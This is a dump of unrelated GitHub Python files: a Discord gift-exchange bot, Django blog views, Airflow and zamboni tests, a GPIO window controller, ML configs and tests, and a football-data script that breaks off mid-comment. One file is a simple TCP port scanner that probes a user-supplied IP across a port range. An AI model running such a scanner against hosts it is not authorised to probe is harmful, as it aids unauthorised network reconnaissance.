im Bot Befehle Channel\n if message.channel == channel_wichtelBotBefehle:\n \n # Gibt die Befehle aus\n if(message.content == 'help'):\n await message.channel.send(\"\\nDie Befehle sind:\\n\\troll again -> Startet die zufällige Ziehnung\\n\\tshow rolls -> Gibt die aktuellen Ziehungen aus\")\n\n # Zieht zufällig die Wichtelpaare und speichert sie in der txt-Datei\n if(message.content == 'roll again'):\n with open(\"birthdays.txt\", 'r') as file: # Parst die Datei birthdays.txt\n lines = file.readlines()\n birthdayList[0].clear()\n birthdayList[1].clear()\n birthdayList[2].clear()\n for line in lines:\n line = line.replace(\"\\n\", \"\")\n name, birthday, selectedPicker = line.split(':')\n tmpBirthdayArray = birthday.split('.')\n birthdayDateTime = datetime.datetime(2020, int(tmpBirthdayArray[1]), int(tmpBirthdayArray[0])) # Geburtstag als datetime\n birthdayDateTime = birthdayDateTime.strftime(\"%d.%m\")\n if(selectedPicker != \"\"):\n birthdayList[2].append(selectedPicker)\n birthdayList[0].append(name)\n birthdayList[1].append(birthdayDateTime)\n\n namesInList = \"\"\n selection = \"\"\n\n # Summiert die Namen mit Geburtstagen und LineBreaks zu einem String\n for index in range(len(birthdayList[0])): \n namesInList += birthdayList[0][index] + \" : \" + birthdayList[1][index] + \"\\n\"\n \n if(birthdayList[2][0] != \"\"):\n # Random shuffeling\n selbergezogen = True\n\n while selbergezogen:\n selbergezogen = False\n birthdayList[2] = birthdayList[0].copy()\n random.shuffle(birthdayList[2])\n \n for i in range(len(birthdayList[0])): # Man darf sich nicht selber ziehen\n if(birthdayList[0][i] == birthdayList[2][i]):\n selbergezogen = True\n\n # Output Ziehung\n for index in range(len(birthdayList[0])): \n selection += birthdayList[0][index] + \" : \" + birthdayList[2][index] + \"\\n\"\n\n output = \"############\\nIn der Ziehung enthalten sind:\\n\\n\"\n output += namesInList\n output += \"#######################\\n\"\n output += \"Die Ziehung hat ergeben:\\n(Beschenkter : Geschenkebringer)\\n\\n\"\n output += selection\n output += \"#######################\"\n await message.channel.send(output)\n\n # Save rolls\n with open(\"birthdays.txt\", \"w\") as file:\n for i in range(len(birthdayList[0])):\n file.write(birthdayList[0][i] + \":\" + birthdayList[1][i] + \":\" + birthdayList[2][i] + \"\\n\")\n\n # Gibt die aktuellen Ziehungen aus\n if(message.content == 'show rolls'):\n with open(\"birthdays.txt\", 'r') as file: # Parst die Datei birthdays.txt\n lines = file.readlines()\n birthdayList[0].clear()\n birthdayList[1].clear()\n birthdayList[2].clear()\n for line in lines:\n line = line.replace(\"\\n\", \"\")\n name, birthday, selectedPicker = line.split(':')\n tmpBirthdayArray = birthday.split('.')\n birthdayDateTime = datetime.datetime(2020, int(tmpBirthdayArray[1]), int(tmpBirthdayArray[0])) # Geburtstag als datetime\n birthdayDateTime = birthdayDateTime.strftime(\"%d.%m\")\n if(selectedPicker != \"\"):\n birthdayList[2].append(selectedPicker)\n birthdayList[0].append(name)\n birthdayList[1].append(birthdayDateTime)\n\n namesInList = \"\"\n selection = \"\"\n \n for index in range(len(birthdayList[0])): \n namesInList += birthdayList[0][index] + \" : \" + birthdayList[1][index] + \"\\n\"\n for index in range(len(birthdayList[0])): \n selection += birthdayList[0][index] + \" : \" + birthdayList[2][index] + \"\\n\"\n\n output = \"############\\nIn der Ziehung enthalten sind:\\n\\n\"\n output += namesInList\n output += \"#######################\\n\"\n output += \"Die Ziehung hat ergeben:\\n(Beschenkter : Geschenkebringer)\\n\\n\"\n output += selection\n output += \"#######################\"\n await message.channel.send(output)\n\n \n \n\n # Geburtsdatum in Channel Geburtsdaten eingeben und in Textdatei speichern\n if message.channel == channel_geburtsdaten:\n if re.search(r\"^[0-9]{2}\\.[0-9]{2}$\", message.content):\n date = message.content.split('.')\n if(int(date[0]) <= 31):\n if(int(date[1]) <=12):\n await message.author.remove_roles(get(message.author.guild.roles , name='Wichtel-Wanderer_unbestaetigt'))\n await message.author.add_roles(get(message.author.guild.roles , name='Wichtel-Wanderer'))\n with open(\"birthdays.txt\", \"a\") as file:\n file.write(str(message.author) + \":\" + message.content + \":\\n\")\n else:\n await message.delete()\n else:\n await message.delete()\n else:\n await message.delete()\n\n # Channel ID zum debuggen ausgeben\n if message.content == 'get_channel_id':\n print(message)\n \n# Verteilt Rollen, wenn man mit einem Geschenk reacted\n@client.event\nasync def on_reaction_add(reaction, user):\n if user == client.user:\n return\n if reaction.emoji == 'ðŸŽ�':\n await user.add_roles(get(user.guild.roles , name='Wichtel-Wanderer_unbestaetigt'))\n await user.remove_roles(get(user.guild.roles , name='Wichtel-Wanderer'))\n await channel_wichtelchat.send('{0} ist jetzt beim Wichteln dabei, Gratulation!!'.format(user))\n\nclient.run(TOKEN)","repo_name":"TheS1mon/Discord_Bots","sub_path":"WichtelMann/wichtelMann_1.0.0.py","file_name":"wichtelMann_1.0.0.py","file_ext":"py","file_size_in_byte":7913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9264898647","text":"# -*- encoding: utf-8 -*-\n\n\"\"\"Common exceptions for the inventory manager.\n\"\"\"\n\n\nclass ExistingMACAddress(Exception):\n code = 409\n message = u'A server with the MAC address %(address)s already exists.'\n\n def __init__(self, address, message=None, **kwargs):\n \"\"\"\n :param address: The conflicting MAC address.\n :param message: The exception message. Optional\n \"\"\"\n\n if not message:\n # Construct the default message.\n message = self.message % address\n\n super(ExistingMACAddress, self).__init__(message)\n\n\nclass ExistingServerName(Exception):\n code = 409\n message = u'A server using the name %(name)s already exists.'\n\n def __init__(self, name, message=None, **kwargs):\n \"\"\"\n :param name:\n :param message:\n :param kwargs:\n \"\"\"\n\n if not message:\n message = self.message % name\n\n super(ExistingServerName, self).__init__(message)\n\n\nclass ExistingServer(Exception):\n code = 409\n message = u'This server already exists.'\n\n def __init__(self):\n super(ExistingServer, self).__init__()\n\n\nclass ServerNotFound(Exception):\n code = 404\n message = u'The server %(identifier)s was not found.'\n\n def __init__(self, message=None, **kwargs):\n \"\"\"\n :param message: An overridden exception message.\n :param uuid: The server's uuid\n :param name: The server's name\n \"\"\"\n\n if not message:\n if kwargs.get('name'):\n message = self.message % kwargs['name']\n elif kwargs.get('uuid'):\n message = self.message % kwargs['uuid']\n else:\n message = u'The server was not found.'\n\n super(ServerNotFound, self).__init__(message)\n\n\nclass ServerReserved(Exception):\n message = ('The server %(uuid) has an existing reservation, please remove'\n ' the reservation and retry.')\n\n def __init__(self, message=None, **kwargs):\n \"\"\"\n :param message:\n :param server_uuid:\n \"\"\"\n\n if not message:\n uuid = kwargs.get('server_uuid')\n if not uuid:\n message = ('The server has an existing reservation, please'\n ' remove and retry the operation.')\n else:\n message = self.message % uuid\n\n super(ServerReserved, self).__init__(message)\n\n\nclass ServerNotReserved(Exception):\n message = 'The server %(server_uuid)s does not have a reservation.'\n\n def __init__(self, message=None, **kwargs):\n\n if not message:\n uuid = kwargs.get('server_uuid')\n if not uuid:\n message = 'The server does not have an existing reservation.'\n else:\n message = self.message % uuid\n\n super(ServerNotReserved, self).__init__(message)\n\n\nclass ServerNotDeployed(Exception):\n message = 'The server %(uuid)s is not in a deployed state.'\n\n def __init__(self, message=None, **kwargs):\n \"\"\"\n :param message: A custom message.\n :param uuid: The server's uuid\n \"\"\"\n\n if not message:\n uuid = kwargs.get('uuid')\n if not uuid:\n message = 'The server is not in a deployed state.'\n else:\n message = self.message % uuid\n\n super(ServerNotDeployed, self).__init__(message)\n","repo_name":"softlayer/ironic-inventory-integrator","sub_path":"ironic_inventory/common/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"31089834353","text":"count=0 #引入计数器\nn=int(input())\nal=list(map(int,input().split()))\na=int(input())\nfor i in range(len(al)):\n if a==al[i]:\n print(i+1) #数列从0开始计算,要知道编号需+1\n count+=1 #如果数列长度为1,则不会触发下面的if\n break\n#如果找不到,输出-1\nif count==0:\n print(-1)","repo_name":"QiYi92/StudyLab","sub_path":"Python/python_lanqiao/查找整数.py","file_name":"查找整数.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"13516623799","text":"import socket\n\ndef scan_ports(target_ip, start_port, end_port):\n \"\"\"Scan ports of a target IP from start_port to end_port.\"\"\"\n \n open_ports = []\n \n for port in range(start_port, end_port + 1):\n # Create a new socket using the combined IP and port\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # Set a timeout for the socket to prevent hanging\n s.settimeout(1)\n # Attempt to establish a connection\n result = s.connect_ex((target_ip, port))\n \n # If the result is 0, the connection was successful\n if result == 0:\n open_ports.append(port)\n \n s.close()\n \n return open_ports\n\nif __name__ == \"__main__\":\n target = input(\"Enter target IP to scan: \")\n start = int(input(\"Enter start port number: \"))\n end = int(input(\"Enter end port number: \"))\n\n open_ports_list = scan_ports(target, start, end)\n \n if open_ports_list:\n print(f\"Open ports on {target} are: {', '.join(map(str, open_ports_list))}\")\n else:\n print(f\"No open ports found on {target} between ports {start} and {end}.\")\n","repo_name":"DAVEALLCAPS/python-security-projects","sub_path":"PortScanner/portscanner.py","file_name":"portscanner.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9999365406","text":"from django.shortcuts import get_object_or_404, render,redirect\nfrom django.views import View\nfrom django.db.models import Q\nfrom .models import Post,Comment,NewsLetter,AboutUs,Tags,Categories,Profile,Contact\nfrom .forms import CommentForm, NewsLetterForm,ContactForm\nfrom django.views.generic import UpdateView,ListView\nfrom django.urls import reverse_lazy\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth.mixins import UserPassesTestMixin\nfrom django.contrib import messages\n\n\n\nclass IndexView(View):\n def get(self,request,*args,**kwargs):\n posts = Post.objects.all()[:6]\n tags = Tags.objects.all()\n categories = Categories.objects.all()[:3]\n\n context = {\n 'posts':posts,\n 'categories':categories,\n 'tags':tags\n }\n return render(request,'blog/index.html',context)\n\nclass BlogList(View):\n def get(self,request,*args,**kwargs):\n posts = Post.objects.all()\n categories = Categories.objects.all()\n\n\n\n context={\n 'posts':posts,\n 'categories':categories\n }\n return render(request,'blog/blog_list.html',context)\n\nclass BlogDetail(View):\n def get(self,request,slug,*args,**kwargs):\n # post = get_object_or_404(Post,slug=slug)\n post = Post.objects.get(slug=slug)\n comment = Comment.objects.filter(post=post)\n related_posts = Post.objects.all()[:6]\n\n context={\n 'post':post,\n 'comments':comment,\n 'related_posts':related_posts,\n }\n return render(request,'blog/detail.html',context)\nclass CommentView(View):\n def post(self,request,pk,*args,**kwargs):\n post = Post.objects.get(pk=pk)\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = form.save(commit=False)\n comment.post = post\n comment.save()\n messages.success(request,'Your comment has been added')\n # return redirect('blog_detail',pk=post.pk)\n return render(request,'blog/partials/comment.html',{'form':form,'post':post})\nclass CommentEditView(UserPassesTestMixin,UpdateView):\n model = Comment\n fields = ['comment']\n template_name = 'social/comment_edit.html'\n def get_success_url(self):\n pk = self.kwargs['pk']\n return reverse_lazy('post_detail',kwargs={'pk':pk})\n\n def test_func(self):\n post = self.get_object()\n return self.request.user == post.author\nclass CommentReplyView(View):\n def post(self,request, post_pk,pk,*args,**kwargs):\n post = Post.objects.get(pk=post_pk)\n parent_comment = Comment.objects.get(pk=pk)\n form = CommentForm(request.POST)\n\n if form.is_valid():\n new_comment = form.save(commit=False)\n new_comment.parent = parent_comment\n new_comment.post = post\n new_comment.save()\n\n context={\n 'post':post,\n 'comment':parent_comment,\n }\n\n return render(request,'blog/partials/comment_reply.html',context)\n\n\nclass NewsLetterView(View):\n def post(self,request,*args,**kwargs):\n form= NewsLetterForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request,\"Thanks for your subscription, you'll receive updates from us weekly\")\n return render(request,'blog/partials/newsletter.html',{'form':form})\n\nclass ContactTemplate(View):\n def get(self,request,*args,**kwargs):\n return render(request,'blog/contact_filler.html')\n\n\nclass ContactView(View):\n def post(self,request,*args,**kwargs):\n contact = ContactForm(request.POST)\n if contact.is_valid:\n contact.save()\n messages.success(request,\"Thanks for contacting us, Our response would get to you soon.\")\n return render(request,'blog/partials/contact.html',{'form':contact})\n\nclass SearchView(View):\n def get(self,request,*args,**kwargs):\n query = self.request.GET.get('query')\n\n posts = Post.objects.filter(\n Q(body__icontains=query))\n\n comments = Comment.objects.filter(\n Q(body__icontains=query)|Q(author__icontains=query))\n\n categories = Categories.objects.filter(\n Q(category_name__icontains=query)|Q(category_title__icontains=query)|\n Q(category_description__icontains=query)\n )\n profiles = Profile.objects.filter(\n Q(name__icontains=query)|Q(proffession__icontains=query)|\n Q(bio__icontains=query))\n context ={\n 'profiles':profiles,\n 'posts':posts,\n 'comments':comments,\n 'categories':categories,\n }\n\n return render(request,'blog/searches.html',context)\n\n\nclass ExploreTagView(View):\n def get(self,request,*args,**kwargs):\n query = self.request.GET.get('tag_query')\n tag = Tags.objects.filter(tag_name=query).first()\n tags = Tags.objects.all()\n \n posts = None\n if tags:\n posts = Post.objects.filter(tags__in =[tag])\n context ={\n 'query':query,\n 'tags':tags,\n 'tag':tag,\n 'posts':posts,\n }\n\n return render(request,'blog/tags.html',context)\n\n def post(self,request,*args,**kwargs):\n explore_form = self.request.POST.get('tag_query')\n \n tag = Tags.objects.filter(tag_name=explore_form)\n\n posts = None\n if tag:\n posts = Post.objects.filter(tags__in=[tag])\n\n if posts:\n context = {\n 'tags':tag,\n 'posts':posts\n }\n else:\n context = {\n 'tags':tag\n }\n return HttpResponseRedirect(f'/blog/tags?tag_query={explore_form}')\n \nclass CategoriesListView(ListView):\n context_object_name = 'categories'\n model = Categories\n page_kwarg = 'page'\n paginate_by = 10\n template_name = 'blog/category-list.html'\n\nclass CategoryDetailView(View):\n def get(self,request,pk,*args,**kwargs):\n category = Categories.objects.get(pk=pk)\n posts = Post.objects.filter(category=category).all()\n\n context={\n 'category':category,\n 'posts':posts,\n }\n return render(request,'blog/category.html',context)\n\nclass AboutUsView(View):\n def get(self,request,*args,**kwargs):\n profiles = Profile.objects.all()\n about = AboutUs.objects.all()\n\n context={\n 'about':about,\n 'profiles':profiles,\n }\n return render(request,'blog/about.html',context)\n\nclass AuthorProfileView(View):\n def get(self,request,slug,*args,**kwargs):\n profile = Profile.objects.get(slug=slug)\n posts = Post.objects.filter(author=profile.user)\n\n context ={\n 'profile':profile,\n 'posts':posts,\n }\n return render(request,'blog/profile.html',context)\n","repo_name":"DeFidelity/heedngrow","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6969,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"17482227255","text":"from math import log10\n\nfrom mock import Mock\nfrom nose.tools import eq_\n\nfrom mkt.constants.base import STATUS_REJECTED\nfrom mkt.site.tests import TestCase\nfrom mkt.site.utils import app_factory\nfrom mkt.search.utils import get_boost, get_popularity, get_trending\nfrom mkt.websites.utils import website_factory\n\n\nclass TestSearchUtils(TestCase):\n def _test_get_trending(self, obj):\n # Test no trending record returns zero.\n eq_(get_trending(obj), 0)\n\n # Add a region specific trending and test the global one is returned\n # because the region is not mature.\n region = Mock(id=1337, adolescent=True)\n obj.trending.create(value=42.0, region=0)\n obj.trending.create(value=10.0, region=region.id)\n eq_(get_trending(obj, region=region), 42.0)\n\n # Now test the regional trending is returned when adolescent=False.\n region.adolescent = False\n eq_(get_trending(obj, region=region), 10.0)\n\n def test_get_trending_app(self):\n app = app_factory()\n self._test_get_trending(app)\n\n def test_get_trending_website(self):\n website = website_factory()\n self._test_get_trending(website)\n\n def _test_get_popularity(self, obj):\n # Test no popularity record returns zero.\n eq_(get_trending(obj), 0)\n\n # Add a region specific popularity and test the global one is returned\n # because the region is not mature.\n region = Mock(id=1337, adolescent=True)\n obj.popularity.create(value=42.0, region=0)\n obj.popularity.create(value=10.0, region=region.id)\n eq_(get_popularity(obj, region=region), 42.0)\n\n # Now test the regional popularity is returned when adolescent=False.\n region.adolescent = False\n eq_(get_popularity(obj, region=region), 10.0)\n\n def test_get_popularity_app(self):\n app = app_factory()\n self._test_get_popularity(app)\n\n def test_get_popularity_website(self):\n website = website_factory()\n self._test_get_popularity(website)\n\n def test_get_boost_app(self):\n app = app_factory()\n app.popularity.create(region=0, value=1000.0)\n eq_(get_boost(app), log10(1 + 1000) * 4)\n\n def test_get_boost_app_not_approved(self):\n app = app_factory(status=STATUS_REJECTED)\n app.popularity.create(region=0, value=1000.0)\n eq_(get_boost(app), log10(1 + 1000))\n\n def test_get_boost_website(self):\n website = website_factory()\n website.popularity.create(region=0, value=1000.0)\n eq_(get_boost(website), log10(1 + 1000) * 4)\n","repo_name":"mozilla/zamboni","sub_path":"mkt/search/tests/test_utils_.py","file_name":"test_utils_.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":476,"dataset":"github-code","pt":"3"} +{"seq_id":"9322940772","text":"from gpiozero import OutputDevice\nfrom time import sleep\nimport ParameterStorage\nfrom Enums import isWindow\nfrom glob import glob\nfrom os import path\nimport TheManager\nimport sys\n\nrelay1 = OutputDevice(6) #relay hooked on pin 6 - note that the relay is activated with a LOW SIGNAL (off)\nrelay2 = OutputDevice(5) #relay hooked on pin 5 - note that the relay is activated with a LOW SIGNAL (off)\nduration = 15 #how long should relays be switched on during opening/closing\n\n\nWINDOW_OPEN_PARAM_NAME = \"Okno\"\nParameterStorage.addParameter(WINDOW_OPEN_PARAM_NAME,\"\")\n__isWindowOpen = isWindow.unknown\n\ndef readMarker()-> isWindow: \n try: \n list_of_files = glob(TheManager.TheManager.markerDirectory+\"*\")\n latest_file = max(list_of_files, key=path.getctime)\n print(latest_file)\n if latest_file.find(\"open\")>=0:\n print(\"I think the window is currently OPEN\")\n return isWindow.open\n elif latest_file.find(\"close\")>=0:\n print(\"I think the window is currently CLOSED\")\n return isWindow.close\n except:\n print(\"Unexpected error:\", sys.exc_info()[0])\n return isWindow.unknown\n \n\n\ndef isWindowOpen():\n global __isWindowOpen\n if __isWindowOpen==isWindow.unknown:\n __isWindowOpen=readMarker()\n ParameterStorage.provideValue(WINDOW_OPEN_PARAM_NAME,__isWindowOpen)\n return __isWindowOpen\n\n\ndef controllerOpenWindow():\n global relay1\n global relay2\n global duration\n global __isWindowOpen\n print(\"Open\")\n try:\n relay2.off()\n relay1.on()\n sleep(duration-2)\n __isWindowOpen=isWindow.open\n finally:\n controllerTurnRelaysOff()\n\ndef controllerCloseWindow():\n global relay1\n global relay2\n global duration\n global __isWindowOpen\n print(\"Close\")\n try:\n relay1.off()\n relay2.on()\n sleep(duration)\n __isWindowOpen=isWindow.close\n finally:\n controllerTurnRelaysOff()\n\ndef controllerTurnRelaysOff():\n global relay1\n global relay2\n print(\"Relays off\")\n try: #to turn the relay off you nedd to set the corresponding signal high\n relay2.on()\n relay1.on()\n except:\n print(\"That went wrong in closing relays...\")\n\n ","repo_name":"dziq1981/WindowsController","sub_path":"WindowsController.py","file_name":"WindowsController.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"875106156","text":"import pandas as pd\n\nfrom postgres_helpers import DBContext\nfrom src.dags.update_hospitalizations.etl_hospitalizations import (\n etl_hospitalizations,\n HOSPITALIZATIONS_ARGS,\n)\nfrom src.lib.test_helpers import run_task_with_url\n\n[_, HOSPITALIZATIONS_SCHEMA, HOSPITALIZATIONS_TABLE] = HOSPITALIZATIONS_ARGS\nHOSPITALIZATIONS_URL = \"http://static-files/static/hospitalizations.csv\"\n\n\ndef test_etl_hospitalizations(pg_context: DBContext):\n\n run_task_with_url(\n \"nuts_regions_population\",\n \"load_nuts_regions\",\n \"http://static-files/static/NUTS2021.xlsx\",\n )\n run_task_with_url(\n \"nuts_regions_population\",\n \"load_population_for_nuts_regions\",\n \"http://static-files/static/demo_r_pjangrp3.tsv\",\n )\n\n etl_hospitalizations(\n HOSPITALIZATIONS_URL, HOSPITALIZATIONS_SCHEMA, HOSPITALIZATIONS_TABLE\n )\n\n hospitalizations = pd.read_sql(\n f\"SELECT * FROM {HOSPITALIZATIONS_SCHEMA}.{HOSPITALIZATIONS_TABLE}\",\n pg_context[\"connection\"],\n )\n\n assert len(hospitalizations) == 82\n\n\ndef test_etl_runs_in_dag(pg_context: DBContext):\n\n run_task_with_url(\n \"nuts_regions_population\",\n \"load_nuts_regions\",\n \"http://static-files/static/NUTS2021.xlsx\",\n )\n run_task_with_url(\n \"nuts_regions_population\",\n \"load_population_for_nuts_regions\",\n \"http://static-files/static/demo_r_pjangrp3.tsv\",\n )\n\n run_task_with_url(\n \"update_hospitalizations\", \"load_hospitalizations\", HOSPITALIZATIONS_URL\n )\n\n hospitalizations = pd.read_sql(\n f\"SELECT * FROM {HOSPITALIZATIONS_SCHEMA}.{HOSPITALIZATIONS_TABLE}\",\n pg_context[\"connection\"],\n )\n\n assert len(hospitalizations) == 82\n","repo_name":"rocs-org/data-pipelines","sub_path":"services/airflow/src/dags/update_hospitalizations/test_etl_hospitalizations.py","file_name":"test_etl_hospitalizations.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"30513141322","text":"# model settings\nmodel = dict(\n type='Recognizer2D',\n backbone=dict(\n type='ResNet',\n pretrained='torchvision://resnet50',\n depth=50,\n norm_eval=False,\n partial_bn=True),\n cls_head=dict(\n type='TRNHead',\n num_classes=400,\n in_channels=2048,\n num_segments=8,\n spatial_type='avg',\n relation_type='TRNMultiScale',\n hidden_dim=256,\n dropout_ratio=0.8,\n init_std=0.001,\n average_clips='prob'),\n data_preprocessor=dict(\n type='ActionDataPreprocessor',\n mean=[123.675, 116.28, 103.53],\n std=[58.395, 57.12, 57.375],\n format_shape='NCHW'))\n","repo_name":"open-mmlab/mmaction2","sub_path":"configs/_base_/models/trn_r50.py","file_name":"trn_r50.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":3560,"dataset":"github-code","pt":"3"} +{"seq_id":"70432629202","text":"import unittest\n\nfrom pitch_contour import *\nimport numpy as np\n\nnp.random.seed(10)\nclass PitchContourTest(unittest.TestCase):\n def enumerate_assignments(i, assignment, N, pitch, frequencies):\n if i == N:\n print (pitch.get_assignment_weight(assignment), assignment)\n else:\n for j in frequencies[i]:\n assignment[i] = j\n enumerate_assignments(i + 1, assignment, N, pitch, frequencies)\n\n def test_freqbin(self):\n bin = getBinFromFrequency(440.0)\n self.assertEqual(bin, 58)\n self.assertEqual(getBinFromFrequency(523), 61)\n\n def test_training(self):\n data = [[1, 2 ,3, 2, 4], [1, 2, 4, 3, 4], [1, 1, 2]]\n trainTransition(data, range(5), \"train.npy\")\n probabilities = np.load(\"train.npy\").item()\n # Verify that all probabilities sum to 1.\n for i in range(5):\n count = 0\n for j in range(5):\n count += probabilities[(i,j)]\n self.assertEqual(int(round(count)), 1)\n\n def test_get_weights(self):\n flat_pitch = PitchContour()\n K = 2\n N = 4\n frequencies = np.array([\n [16, 15],\n [15, 14],\n [12, 13],\n [10, 12]\n ])\n probabilities = np.array([\n [0.1, 0.9],\n [0.1, 0.9],\n [0.45, 0.55],\n [0, 1]\n ])\n flat_pitch.setNotes(N, K, probabilities, frequencies)\n\n assignment = {0: 15, 1: 14, 2: 13, 3: 12}\n self.assertEqual(flat_pitch.get_assignment_weight(assignment), \\\n flat_pitch.get_delta_weight({}, 0, 15) + flat_pitch.get_delta_weight({0:15}, 1, 14) + \\\n flat_pitch.get_delta_weight({0:15, 1: 14}, 2, 13) + flat_pitch.get_delta_weight({0:15, 1: 14, 2: 13}, 3, 12))\n\n def test_inference(self):\n flat_pitch = PitchContour()\n K = 2\n N = 4\n frequencies = np.array([\n [16, 15],\n [15, 14],\n [12, 13],\n [10, 12]\n ])\n probabilities = np.array([\n [0.1, 0.9],\n [0.1, 0.9],\n [0.45, 0.55],\n [0, 1]\n ])\n flat_pitch.setNotes(N, K, probabilities, frequencies)\n solutionCSP = flat_pitch.solve()\n solutionBacktrack = flat_pitch.solve(mode='backtrack')\n self.assertTrue(solutionBacktrack == solutionCSP)\n\n def test_both(self):\n data = [[1, 2 ,3, 2, 4], [1, 2, 4, 3, 4], [1, 1, 2]]\n transition = np.load(\"train.npy\").item()\n pitch = PitchContour()\n K = 2\n N = 4\n bins = np.array([\n [1, 4],\n [2, 3],\n [3, 1],\n [2, 4]\n ])\n probabilities = np.array([\n [0.9, 0.1],\n [0.5, 0.5],\n [0.45, 0.55],\n [1, 0]\n ])\n pitch.setTransitionProbability(lambda f1, f2 : transition[(f1, f2)])\n pitch.setNotes(N, K, probabilities, bins)\n solutionCSP = pitch.solve()\n solutionBacktrack = pitch.solve(mode='backtrack')\n print (solutionBacktrack, solutionCSP)\n\n def test_gibbs(self):\n data = [[1, 2 ,3, 2, 4], [1, 2, 4, 3, 4], [1, 1, 2]]\n transition = np.load(\"train.npy\").item()\n pitch = PitchContour()\n K = 2\n N = 4\n bins = np.array([\n [1, 4],\n [2, 3],\n [3, 1],\n [2, 4]\n ])\n probabilities = np.array([\n [0.9, 0.12],\n [0.5, 0.5],\n [0.45, 0.55],\n [1, 0]\n ])\n pitch.setTransitionProbability(lambda f1, f2 : transition[(f1, f2)])\n pitch.setNotes(N, K, probabilities, bins)\n solutionCSP = pitch.solve(mode=\"gibbs\")\n solutionBacktrack = pitch.solve(mode='backtrack')\n print (solutionBacktrack, solutionCSP)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"ClaraBing/CS229-MusicTranscription","sub_path":"cspTest.py","file_name":"cspTest.py","file_ext":"py","file_size_in_byte":3768,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"3"} +{"seq_id":"17323536006","text":"#coding: utf-8\n\ndef valida_triangulo(a, b, c):\n\tif a>((b-c)*-1) and a<(b+c) and b>((a-c)*-1) and b<(a+c) and c>((a-b)*-1) and c<(a+b):\n\t\tresultado = a+b+c\n\t\tprint(\"Perímetro: %.1f\"%resultado,\".\")\n\telse:\n\t\tresultado = ((a+b)*c)/2\n\t\tprint(\"Área: %.1f\"%resultado,\".\")\n\n\n\ndef main():\n\tlado_a = int(input(\"Digite um Valor para o Lado A do Triângulo: \"))\n\tlado_b = int(input(\"Digite um Valor para o Lado B do Triângulo: \"))\n\tlado_c = int(input(\"Digite um Valor para o Lado C do Triângulo: \"))\n\tvalida_triangulo(lado_a, lado_b, lado_c)\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"rogeriosilva-ifpi/adsi-algoritmos-2016.1","sub_path":"atividade_d/Osmar_Junior_ADS2016_1/atdq8.py","file_name":"atdq8.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"141696316","text":"# Question 1 - Predicting the winner\n\n# Firstly we need to import some modules to help us along the way.\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom collections import Counter\n\n\ndata = pd.read_csv(\"resources/PremierLeague1718.csv\") # Read the data set file\n\n\n# The data file consists of empty columns and rows which we want to clean up so that we are working with _clean_ data.\n# To do this we can use the below function.\ndef clean(dataframe):\n assert isinstance(dataframe, pd.DataFrame), 'Argument of wrong type!'\n return dataframe.dropna(axis=1, how='all')\n\n\ndata = clean(data) # Clean the data up to remove empty and NaN cols\n\n\n# Because the data file consists of a lot of columns, some of them are irrelevant to us,\n# the below function can help eliminate these columns, to do this we can specify only the columns we want to keep as a list of column names.\ndef filterCols(dataframe, cols):\n assert isinstance(dataframe, pd.DataFrame), 'Argument of wrong type!'\n assert isinstance(cols, list), 'Argument of wrong type!'\n return dataframe[cols]\n\n\n# We can then use this function to filter our data.\ncolsToKeep = [\"Date\", \"HomeTeam\", \"AwayTeam\", \"FTHG\", \"FTAG\", \"HS\", \"AS\", \"HST\", \"AST\", \"FTR\"] # List of cols we want to keep\ndata = filterCols(data, colsToKeep) # Filter relevant cols\n\n\n# To get an idea of how the data looks like, we can use the `describe` function to give us various information.\n# (This is helpful to answer Question 1, part 1.)\nprint(\"Description:\")\nprint(data.describe())\n\n\n# This function will allow us to rename an existing column in a dataframe.\ndef renameCols(df, colsdict):\n assert isinstance(df, pd.core.series.Series), 'Argument of wrong type!'\n assert isinstance(colsdict, dict), 'Argument of wrong type!'\n assert len([x for x in colsdict.keys() if x in df]) != len(colsdict), \"One or more columns you want to rename do not exist in the dataframe\"\n return df.reset_index().rename(columns=colsdict)\n\n\n# Furthermore, we can also group the data in a way so that we can see an outlook of how many goals were scored\n# and conceded by each team over the whole league.\ndef creategroups():\n groups = [0,0,0,0]\n groups[0] = renameCols(data.groupby(\"HomeTeam\")[\"FTR\"].apply(lambda x: x[x == 'H'].count()), {\"HomeTeam\": \"Team\", \"FTR\": \"Wins at home\"})\n groups[1] = renameCols(data.groupby(\"AwayTeam\")[\"FTR\"].apply(lambda x: x[x == 'A'].count()), {\"AwayTeam\": \"Team\", \"FTR\": \"Wins away\"})\n groups[2] = renameCols(data.groupby(\"HomeTeam\")[\"FTR\"].apply(lambda x: x[x == 'A'].count()), {\"HomeTeam\": \"Team\", \"FTR\": \"Losses at home\"})\n groups[3] = renameCols(data.groupby(\"AwayTeam\")[\"FTR\"].apply(lambda x: x[x == 'H'].count()), {\"AwayTeam\": \"Team\", \"FTR\": \"Losses away\"})\n return groups\n\n# Then we can merge these groups to present the data 